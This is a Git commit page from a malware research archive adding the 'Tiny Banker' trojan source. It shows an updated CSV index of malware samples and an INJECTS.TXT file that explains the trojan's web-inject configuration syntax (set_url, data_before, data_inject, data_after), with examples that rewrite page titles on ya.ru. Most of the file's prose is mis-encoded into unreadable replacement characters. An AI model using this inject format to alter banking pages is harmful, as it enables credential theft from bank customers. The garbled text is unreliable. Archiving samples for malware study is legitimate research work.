malware-analysis/theZoo
1
0
Fork 0
mirror of https://github.com/ytisf/theZoo.git synced 2026-02-21 11:18:08 +00:00
Code Issues Packages Projects Releases Wiki Activity

tiny_banker

Browse Source 
thanks to Shahak
This commit is contained in:
Yuval Nativ
2014-09-30 16:43:17 +03:00
parent 914c35feaa
commit 60bfc88720
205 changed files with 23133 additions and 10 deletions
Download Patch File Download Diff File Expand all files Collapse all files

21
conf/index.csv
View File

@@ -1,17 +1,17 @@
1,Source/Original/Dokan_Dec2008/Dokan_Dec2008,botnet,Dokan,unknown,unknown,c,00/12/2008,x86,win32,0
3,Source/Original/ShadowBotv3_March2007/ShadowBotv3_March2007,botnet,ShadowBot,3,unknown,cpp,03/2007,x86,win32,0
3,Source/Original/ShadowBotv3_March2007/ShadowBotv3_March2007,botnet,ShadowBot,3,unknown,cpp,Mar-07,x86,win32,0
4,Source/Original/rBot0.3.3_May2004/rBot0.3.3_May2004,botnet,rBot,0.3.3,unknown,cpp,00/05/2004,x86,win32,0
5,Source/Original/ZeuS2.0.8.9_Feb2013/ZeuS2.0.8.9_Feb2013,botnet,ZeuS,2.0.8.9,unknown,c,02/2013,x86,win32,1
5,Source/Original/ZeuS2.0.8.9_Feb2013/ZeuS2.0.8.9_Feb2013,botnet,ZeuS,2.0.8.9,unknown,c,Feb-13,x86,win32,1
6,Source/Original/X0R-USB_Jan2009/X0R-USB_Jan2009,virus,X0R-USB-Virus,unknown,unknown,c,00/01/2009,x86,win32,0
7,Source/Original/LoexBot1.3_Sep2008/LoexBot1.3_Sep2008,botnet,LoexBot,1.3,unknown,cpp,00/09/2008,x86,win32,0
8,Source/Original/ZunkerBot1.4.5_Sep2007/ZunkerBot1.4.5_Sep2007,botnet,ZunkerBot,1.4.5,unknown,php,09/2007,x86,win32,0
8,Source/Original/ZunkerBot1.4.5_Sep2007/ZunkerBot1.4.5_Sep2007,botnet,ZunkerBot,1.4.5,unknown,php,Sep-07,x86,win32,0
9,Source/Original/DopeBotv0.22_UnCrippled_Feb2007/DopeBotv0.22_UnCrippled_Feb2007,botnet,DopeBot-UnCrippled,0.22,unknown,cpp,00/02/2007,x86,win32,0
10,Source/Original/vbBot_Jan2007/vbBot_Jan2007,botnet,vbBot,unknown,unknown,vb,01/2007,x86,win32,0
11,Source/Original/xTBot0.0.2_2Feb2002/xTBot0.0.2_2Feb2002,botnet,xTBot,0.0.2,unknown,cpp,02/2002,x86,win32,0
10,Source/Original/vbBot_Jan2007/vbBot_Jan2007,botnet,vbBot,unknown,unknown,vb,Jan-07,x86,win32,0
11,Source/Original/xTBot0.0.2_2Feb2002/xTBot0.0.2_2Feb2002,botnet,xTBot,0.0.2,unknown,cpp,Feb-02,x86,win32,0
12,Source/Original/VBS.Win32.Vabian/VBS.Win32.Vabian,VBS-Worm,VBS.Win32.Vabian,botnet,unknown,vb,unknown,x86,win32,0
13,Source/Original/DopeBotv0.22_CrippledFeb2007/DopeBotv0.22_CrippledFeb2007,botnet,DopeBot-Crippled,0.22,unknown,cpp,00/02/2007,x86,win32,0
14,Source/Original/Win32.MiniPig_Nov2006/Win32.MiniPig_Nov2006,Worm,Win32.MiniPig,virus,unknown,c,00/11/2006,x86,win32,0
15,Source/Original/HellBotv3.0_10June2005/HellBotv3.0_10June2005,botnet,Hellbot,3.0,unknown,cpp,00/06/2005,x86,win32,0
15,Source/Original/HellBotv3.0_10June2005/HellBotv3.0_10June2005,botnet,Hellbot,3,unknown,cpp,00/06/2005,x86,win32,0
16,Source/Original/Win32.ogw0rm_Nov2008/Win32.ogw0rm_Nov2008,Worm,Win32.ogwOrm,unknown,unknown,cpp,00/11/2008,x86,win32,0
17,Source/Original/DopeBot.B_Dec2004/DopeBot.B_Dec2004,botnet,DopeBot.B,unknown,unknown,cpp,00/12/2004,x86,win32,0
18,Source/Original/LiquidBot_May2005/LiquidBot_May2005,botnet,LiquidBot,unknown,unknown,cpp,00/05/2005,x86,win32,0
@@ -28,11 +28,11 @@
29,Binaries/Trojan.Dropper.Gen/Trojan.Dropper.Gen,trojan,Dropper,Unknown,Unknown,bin,00/01/2014,x86,win32,0
30,Binaries/Trojan.NSIS.Win32/Trojan.NSIS.Win32,trojan,NSIS,Unknown,Unknown,bin,00/01/2014,x86,win32,0
31,Binaries/Trojan.Win32.Bechiro.BCD/Trojan.Win32.Bechiro.BCD,trojan,Bechiro,BCD,Unknown,bin,00/01/2014,x86,win32,0
32,Binaries/AndroRat_6Dec2013/AndroRat_6Dec2013,botnet,AndroRat,Dec2013,Unknown,java,06/12/2013,x86,win32,0
33,Binaries/CryptoLocker_22Jan2014/CryptoLocker_22Jan2014,ransomeware,CryptoLocker,Jan2014,Unknown,bin,22/01/2014,x86,win32,1
32,Binaries/AndroRat_6Dec2013/AndroRat_6Dec2013,botnet,AndroRat,Dec-13,Unknown,java,06/12/2013,x86,win32,0
33,Binaries/CryptoLocker_22Jan2014/CryptoLocker_22Jan2014,ransomeware,CryptoLocker,Jan-14,Unknown,bin,22/01/2014,x86,win32,1
34,Binaries/njRAT-v0.6.4/njRAT-v0.6.4,botnet,njRAT,0.6.4,Unknown,bin,00/09/2013,x86,win32,0
35,Binaries/ZeusBankingVersion_26Nov2013/ZeusBankingVersion_26Nov2013,botnet,Zeus - zBot,Nov2013,Unknown,bin,23/11/2013,x86,win32,1
36,Source/Original/NullBot_Dec2006/NullBot_Dec2006,botnet,NullBot,Dec2006,Unknown,cpp,00/12/2006,x86,win32,0
35,Binaries/ZeusBankingVersion_26Nov2013/ZeusBankingVersion_26Nov2013,botnet,Zeus - zBot,Nov-13,Unknown,bin,23/11/2013,x86,win32,1
36,Source/Original/NullBot_Dec2006/NullBot_Dec2006,botnet,NullBot,Dec-06,Unknown,cpp,00/12/2006,x86,win32,0
37,Binaries/Artemis,trojan,Artemis,Unknown,Unknown,bin,00/00/0000,x86,win32,0
38,Binaries/Somoto,apt,Somoto,unknown,unknown,bin,00/00/0000,x86,win32,0
39,Binaries/Variant.Kazy,trojan,Variant.Kazy,unknown,unknown,bin,00/00/0000,x86,win32,0
@@ -59,3 +59,4 @@
60,Binaries/SpyEye,botnet,SpyEye,Unknown,Unknown,bin,23/06/2014,x86,win32,0
61,Binaries/Powerliks,botnet,Powerliks,Unknown,Unknown,bin,09/08/2014,x86,win32,1
62,Binaries/ZeroLocker,ransomware,Zerolocker,A,Unknown,bin,09/08/2014,x86,win32,0
63,Sources/Original/TinyBanker_Jan2012,botnet,Tiny Banker,A,Russia,asm,00/01/2012,x86,win32,0
1 1 Source/Original/Dokan_Dec2008/Dokan_Dec2008 botnet Dokan unknown unknown c 00/12/2008 x86 win32 0
2 3 Source/Original/ShadowBotv3_March2007/ShadowBotv3_March2007 botnet ShadowBot 3 unknown cpp 03/2007 Mar-07 x86 win32 0
3 4 Source/Original/rBot0.3.3_May2004/rBot0.3.3_May2004 botnet rBot 0.3.3 unknown cpp 00/05/2004 x86 win32 0
4 5 Source/Original/ZeuS2.0.8.9_Feb2013/ZeuS2.0.8.9_Feb2013 botnet ZeuS 2.0.8.9 unknown c 02/2013 Feb-13 x86 win32 1
5 6 Source/Original/X0R-USB_Jan2009/X0R-USB_Jan2009 virus X0R-USB-Virus unknown unknown c 00/01/2009 x86 win32 0
6 7 Source/Original/LoexBot1.3_Sep2008/LoexBot1.3_Sep2008 botnet LoexBot 1.3 unknown cpp 00/09/2008 x86 win32 0
7 8 Source/Original/ZunkerBot1.4.5_Sep2007/ZunkerBot1.4.5_Sep2007 botnet ZunkerBot 1.4.5 unknown php 09/2007 Sep-07 x86 win32 0
8 9 Source/Original/DopeBotv0.22_UnCrippled_Feb2007/DopeBotv0.22_UnCrippled_Feb2007 botnet DopeBot-UnCrippled 0.22 unknown cpp 00/02/2007 x86 win32 0
9 10 Source/Original/vbBot_Jan2007/vbBot_Jan2007 botnet vbBot unknown unknown vb 01/2007 Jan-07 x86 win32 0
10 11 Source/Original/xTBot0.0.2_2Feb2002/xTBot0.0.2_2Feb2002 botnet xTBot 0.0.2 unknown cpp 02/2002 Feb-02 x86 win32 0
11 12 Source/Original/VBS.Win32.Vabian/VBS.Win32.Vabian VBS-Worm VBS.Win32.Vabian botnet unknown vb unknown x86 win32 0
12 13 Source/Original/DopeBotv0.22_CrippledFeb2007/DopeBotv0.22_CrippledFeb2007 botnet DopeBot-Crippled 0.22 unknown cpp 00/02/2007 x86 win32 0
13 14 Source/Original/Win32.MiniPig_Nov2006/Win32.MiniPig_Nov2006 Worm Win32.MiniPig virus unknown c 00/11/2006 x86 win32 0
14 15 Source/Original/HellBotv3.0_10June2005/HellBotv3.0_10June2005 botnet Hellbot 3.0 3 unknown cpp 00/06/2005 x86 win32 0
15 16 Source/Original/Win32.ogw0rm_Nov2008/Win32.ogw0rm_Nov2008 Worm Win32.ogwOrm unknown unknown cpp 00/11/2008 x86 win32 0
16 17 Source/Original/DopeBot.B_Dec2004/DopeBot.B_Dec2004 botnet DopeBot.B unknown unknown cpp 00/12/2004 x86 win32 0
17 18 Source/Original/LiquidBot_May2005/LiquidBot_May2005 botnet LiquidBot unknown unknown cpp 00/05/2005 x86 win32 0
28 29 Binaries/Trojan.Dropper.Gen/Trojan.Dropper.Gen trojan Dropper Unknown Unknown bin 00/01/2014 x86 win32 0
29 30 Binaries/Trojan.NSIS.Win32/Trojan.NSIS.Win32 trojan NSIS Unknown Unknown bin 00/01/2014 x86 win32 0
30 31 Binaries/Trojan.Win32.Bechiro.BCD/Trojan.Win32.Bechiro.BCD trojan Bechiro BCD Unknown bin 00/01/2014 x86 win32 0
31 32 Binaries/AndroRat_6Dec2013/AndroRat_6Dec2013 botnet AndroRat Dec2013 Dec-13 Unknown java 06/12/2013 x86 win32 0
32 33 Binaries/CryptoLocker_22Jan2014/CryptoLocker_22Jan2014 ransomeware CryptoLocker Jan2014 Jan-14 Unknown bin 22/01/2014 x86 win32 1
33 34 Binaries/njRAT-v0.6.4/njRAT-v0.6.4 botnet njRAT 0.6.4 Unknown bin 00/09/2013 x86 win32 0
34 35 Binaries/ZeusBankingVersion_26Nov2013/ZeusBankingVersion_26Nov2013 botnet Zeus - zBot Nov2013 Nov-13 Unknown bin 23/11/2013 x86 win32 1
35 36 Source/Original/NullBot_Dec2006/NullBot_Dec2006 botnet NullBot Dec2006 Dec-06 Unknown cpp 00/12/2006 x86 win32 0
36 37 Binaries/Artemis trojan Artemis Unknown Unknown bin 00/00/0000 x86 win32 0
37 38 Binaries/Somoto apt Somoto unknown unknown bin 00/00/0000 x86 win32 0
38 39 Binaries/Variant.Kazy trojan Variant.Kazy unknown unknown bin 00/00/0000 x86 win32 0
59 60 Binaries/SpyEye botnet SpyEye Unknown Unknown bin 23/06/2014 x86 win32 0
60 61 Binaries/Powerliks botnet Powerliks Unknown Unknown bin 09/08/2014 x86 win32 1
61 62 Binaries/ZeroLocker ransomware Zerolocker A Unknown bin 09/08/2014 x86 win32 0
62 63 Sources/Original/TinyBanker_Jan2012 botnet Tiny Banker A Russia asm 00/01/2012 x86 win32 0

215
malwares/Source/Original/TinyBanker_Jan2012/INJECTS.TXT Normal file
View File

@@ -0,0 +1,215 @@
08.04.12
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> set_url (<28><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 2 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> URL <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> set_url <20> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
G - <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> GET <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> URL
P - <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> POST <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> URL
L - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>:
* - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
# - <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #
? - <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<09><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> set_url <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>. <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> set_url <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: data_before, data_inject, data_after.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_end <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>. <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
data_before - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
data_after - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
data_inject - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #1. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
set_url http://ya.ru/ gp
data_before
<title>
data_end
data_inject
New Title
data_end
data_after
</title>
data_end
<EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> http://ya.ru/ <20><><EFBFBD> GET <20> POST <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> New Title <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <title> <20> </title>. <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #2. <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
SET_URL http://ya.ru/ PG
DATA_BEFORE
<title>
DATA_END
DATA_AFTER
</title>
DATA_END
data_after
</body>
